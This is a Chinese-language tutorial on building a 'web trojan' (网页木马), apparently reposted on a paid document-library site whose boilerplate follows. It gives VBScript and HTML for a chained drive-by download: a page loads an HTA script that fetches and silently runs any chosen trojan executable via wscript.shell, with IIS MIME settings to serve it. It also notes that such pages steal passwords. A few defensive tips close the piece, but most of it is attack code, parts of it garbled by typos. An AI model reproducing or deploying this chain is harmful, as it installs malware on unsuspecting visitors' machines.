网页木马制作讲解

网页木马制作讲解我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木。首先我们需要编写几个简单的文件一、名字为abc.abc的文件〈html〉〈scriptlanguage=“vbscript“〉FunctionHttpDoGet(url)setoReq=CreateObject(“Microsoft.XMLHTTP“)oReq.open“GET“,url,falseoReq.sendIfoReq.status=200thenHttpDoGet=oReq.respomseBodySavefileHttpDoGet,“c:\win.exe“EndIfSetoReq=nothingEndFunctionsubSaveFile(str.fName)SetobjStream=CreateObject(“ADODB.Stream“)objStream.Type=1objStream.OpenobjStream.writestrobjStream.SaveToFilefName.2objStream.Close()setobjStream=nothingexewin()EndsubSubexewin()setwshshell=createobject(“wscript.shell“)a=wshshell.run(“cmd.exe/cc:\win.exe“,0)b=wshshell.run(“cmd.exe/cdelc:\win.hta“,0)window.closeEndSubHttpDoGet“http://127.0.0.1/test.exe“〈/script〉〈/html〉其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。二、名字为test.htm的文件〈html〉〈body〉木马运行测试!(这句话可以改成你想说的)〈objectdate=“http://127.0.0.1/win.test“;;;〉〈/object〉〈/body〉〈/html〉三、名字为win.test的文件〈html〉〈body〉〈scriptlanguage=“vbscript“〉FunctionHttpDoGet(url)setoReq=CreateObject(“Microsoft.XMLHTTP“)oReq.open“GET“,url,falseoReq.sendIfoReq.status=200thenHttpDoGet,“c:\win.hta“SetoReq=nothingEndifendfunctionsubSaveFile(str,fName)Dimfso,tfSetfso=CreateObject(Scripting.FileSystemObject“)Settf=fso.CreateTextfile(fName,True)tf.Writestrtf.Closeexewin()EndsubSubexewin()setwshshell=createobject(“wscript.shell“)a=wshshell.run(“cmd.exe/cc:\win.hat“,0)window.closeEndSubHttpDoGet(“http://127.0.0.1/abc.abc“)〈/script〉〈/body〉〈/html〉四、名字为test.exe的木马程序。晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。服务器的文件列表test.htm:对外发布的网页win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。abc.abc下载二进制的木马文件test.exe,并执行。test.exe:木马程序。上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta“,然后关闭所有窗口就可以了。有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,A、安装IE的最新版本并且随时下在才做系统和IE的补丁程序。B、不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。C、不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。D、不随便打开和预览有附件的邮件。E、安装防火墙和杀毒软件的最新版本,经常进行升级和查毒。

1、当您付费下载文档后,您只拥有了使用权限,并不意味着购买了版权,文档只能用于自身使用,不得用于其他商业用途(如 [转卖]进行直接盈利或[编辑后售卖]进行间接盈利)。
2、本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供参考,付费前请自行鉴别。
3、如文档内容存在侵犯商业秘密、侵犯著作权等,请点击“举报”。

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

客服邮箱:

biganzikefu@outlook.com

所有的文档都被视为“模板”,用于写作参考,下载前须认真查看,确认无误后再购买;

文档大部份都是可以预览的,笔杆子文库无法对文档的真实性、完整性、准确性以及专业性等问题提供审核和保证,请慎重购买;

文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为依据;

如果您还有什么不清楚的或需要我们协助,可以联系客服邮箱:

biganzikefu@outlook.com

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

文秘专家
机构认证
内容提供者

1

确认删除?